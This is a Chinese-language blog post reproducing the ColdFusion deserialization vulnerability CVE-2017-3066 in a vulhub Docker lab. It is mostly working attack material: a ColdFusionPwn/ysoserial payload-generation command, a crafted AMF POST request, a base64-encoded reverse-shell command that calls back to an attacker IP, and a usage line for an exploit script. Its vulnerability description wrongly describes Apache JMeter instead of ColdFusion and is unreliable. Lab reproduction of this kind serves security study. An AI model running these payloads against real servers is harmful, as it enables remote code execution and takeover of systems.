ColdFusion 反序列化漏洞复现 CVE-2017-3066

admin 2020年8月25日11:30:07评论563 views字数 1570阅读5分14秒阅读模式


一、环境搭建:

进入镜像目录:

cd vulhub/coldfusion/CVE-2017-3066

启动环境:

docker-compose up -d

访问如下页面,并且输入密码:vulhub即可完成搭建:

ColdFusion 反序列化漏洞复现 CVE-2017-3066




二、漏洞描述:

Apache JMeter是美国阿帕奇(Apache)软件基金会的一套使用Java语言编写的用于压力测试和性能测试的开源软件。其2.x版本和3.x版本中存在反序列化漏洞,攻击者可以利用该漏洞在目标服务器上执行任意命令



三、漏洞复现:

1、使用ColdFusionPwn.jar,生成poc:

下载链接:

https://github.com/codewhitesec/ColdFusionPwn/releases/download/0.0.1/ColdFusionPwn-0.0.1-SNAPSHOT-all.jar


java -cp ColdFusionPwn.jar:ysoserial.jar com.codewhitesec.coldfusionpwn.ColdFusionPwner -e CommonsBeanutils1 'touch /tmp/CVE-2017-3066_success' poc.ser

会在当前目录下生成一个poc.ser文件:

ColdFusion 反序列化漏洞复现 CVE-2017-3066



2、构造如下post数据包:

POST /flex2gateway/amf HTTP/1.1Host: 192.168.136.140:8500Accept-Encoding: gzip, deflateAccept: */*Accept-Language: enUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)Connection: closeContent-Type: application/x-amfContent-Length: 0
...poc...

选择:Paste From File,粘贴poc.ser的内容到post数据中:

ColdFusion 反序列化漏洞复现 CVE-2017-3066



然后发送请求:

ColdFusion 反序列化漏洞复现 CVE-2017-3066



成功创建文件:

ColdFusion 反序列化漏洞复现 CVE-2017-3066


3、反弹shell:

将命令改为反弹shell的payload,并且使用:http://www.jackson-t.ca/runtime-exec-payloads.html,进行编码:

java -cp ColdFusionPwn.jar:ysoserial.jar com.codewhitesec.coldfusionpwn.ColdFusionPwner -e CommonsBeanutils1 'bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEzNi4xMjkvNzc3NyAwPiYx}|{base64,-d}|{bash,-i}' poc2.ser

然后利用ColdFusionPwn.jar生成ser文件即可:

ColdFusion 反序列化漏洞复现 CVE-2017-3066

和上面一样,使用burp发送请求即可:

ColdFusion 反序列化漏洞复现 CVE-2017-3066

成功收到反弹shell:

ColdFusion 反序列化漏洞复现 CVE-2017-3066



四、漏洞EXP

需要配合ColdFusionPwn.jar生成ser文件:

python3 CVE-2017-3066_EXP.py http://192.168.136.140:8500 -f poc2.ser

使用脚本将ser文件发送

ColdFusion 反序列化漏洞复现 CVE-2017-3066

成功收到反弹shell:

ColdFusion 反序列化漏洞复现 CVE-2017-3066


脚本已经打包好了,需要的看官后台留言:coldFusion exp,链接有效期为7天,请注意保存,请仅用于学习研究!


各位师傅可以加好友一起学习交流交个朋友,如果之前分享的exp失效了,也可以加我好友py一下:qq:1254311935

备注:公众号+师傅们的id吧

ColdFusion 反序列化漏洞复现 CVE-2017-3066

注意:脚本仅作为学习和讨论使用,禁止利用其进行任何违法行为,与作者无关!

注意:脚本仅作为学习和讨论使用,禁止利用其进行任何违法行为,与作者无关!

注意:脚本仅作为学习和讨论使用,禁止利用其进行任何违法行为,与作者无关!


  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2020年8月25日11:30:07
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   ColdFusion 反序列化漏洞复现 CVE-2017-3066https://cn-sec.com/archives/102240.html

发表评论

匿名网友 填写信息